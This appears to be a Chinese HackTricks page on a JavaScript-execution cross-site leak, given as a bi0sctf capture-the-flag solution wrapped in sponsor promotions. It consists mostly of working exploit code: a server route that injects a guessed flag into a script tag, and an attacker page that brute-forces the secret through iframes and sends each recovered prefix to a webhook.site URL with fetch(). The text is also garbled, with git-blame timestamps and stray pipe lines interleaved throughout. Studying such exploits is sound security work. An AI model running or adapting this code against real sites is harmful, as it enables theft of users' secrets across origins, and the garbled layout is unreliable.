2023-08-03 19:12:22 +00:00
|
|
|
|
# JavaScript执行XS泄漏
|
2023-01-22 23:19:55 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2023-01-22 23:19:55 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* 你在一家**网络安全公司**工作吗?你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
|
|
|
|
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
|
2023-01-22 23:19:55 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
```javascript
|
|
|
|
|
// Code that will try ${guess} as flag (need rest of the server code
|
|
|
|
|
app.get('/guessing', function(req, res) {
|
2023-08-03 19:12:22 +00:00
|
|
|
|
let guess = req.query.guess
|
|
|
|
|
let page = `<html>
|
|
|
|
|
<head>
|
|
|
|
|
<script>
|
|
|
|
|
function foo() {
|
|
|
|
|
// If not the flag this will be executed
|
|
|
|
|
window.parent.foo()
|
|
|
|
|
}
|
|
|
|
|
</script>
|
|
|
|
|
<script src="https://axol.space/search?query=${guess}&hint=foo()"></script>
|
|
|
|
|
</head>
|
|
|
|
|
<p>hello2</p>
|
|
|
|
|
</html>`
|
|
|
|
|
res.send(page)
|
2023-01-22 23:19:55 +00:00
|
|
|
|
});
|
|
|
|
|
```
|
2023-08-03 19:12:22 +00:00
|
|
|
|
主页会生成iframe到之前的`/guessing`页面,以测试每种可能性。
|
2023-01-22 23:19:55 +00:00
|
|
|
|
```html
|
|
|
|
|
<html>
|
|
|
|
|
<head>
|
2023-08-03 19:12:22 +00:00
|
|
|
|
<script>
|
|
|
|
|
let candidateIsGood = false;
|
|
|
|
|
let candidate = ''
|
|
|
|
|
let flag = 'bi0sctf{'
|
|
|
|
|
let guessIndex = -1
|
|
|
|
|
|
|
|
|
|
let flagChars = '_0123456789abcdefghijklmnopqrstuvwxyz}ABCDEFGHIJKLMNOPQRSTUVWXYZ'
|
2023-01-22 23:19:55 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
// this will get called from our iframe IF the candidate is WRONG
|
|
|
|
|
function foo() {
|
|
|
|
|
candidateIsGood = false
|
|
|
|
|
}
|
2023-01-22 23:19:55 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
timerId = setInterval(() => {
|
|
|
|
|
if (candidateIsGood) {
|
|
|
|
|
flag = candidate
|
|
|
|
|
guessIndex = -1
|
|
|
|
|
fetch('https://webhook.site/<yours-goes-here>?flag='+flag)
|
|
|
|
|
}
|
2023-01-22 23:19:55 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
//Start with true and will be change to false if wrong
|
|
|
|
|
candidateIsGood = true
|
|
|
|
|
guessIndex++
|
|
|
|
|
if (guessIndex >= flagChars.length) {
|
|
|
|
|
fetch('https://webhook.site/<yours-goes-here>')
|
|
|
|
|
return
|
|
|
|
|
}
|
|
|
|
|
let guess = flagChars[guessIndex]
|
|
|
|
|
candidate = flag + guess
|
|
|
|
|
let iframe = `<iframe src="/guessing?guess=${encodeURIComponent(candidate)}"></iframe>`
|
|
|
|
|
console.log('iframe: ', iframe)
|
|
|
|
|
hack.innerHTML = iframe
|
|
|
|
|
}
|
|
|
|
|
, 500);
|
|
|
|
|
</script>
|
2023-01-22 23:19:55 +00:00
|
|
|
|
</head>
|
|
|
|
|
<p>hello</p>
|
|
|
|
|
<div id="hack">
|
|
|
|
|
</div>
|
|
|
|
|
</html>
|
|
|
|
|
```
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2023-01-22 23:19:55 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* 你在一家**网络安全公司**工作吗?想要在 HackTricks 中**宣传你的公司**吗?或者你想要**获取最新版本的 PEASS 或下载 HackTricks 的 PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
|
|
|
|
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或者**关注**我在**推特**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* **通过向** [**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**
|
2023-01-22 23:19:55 +00:00
|
|
|
|
|
|
|
|
|
</details>
|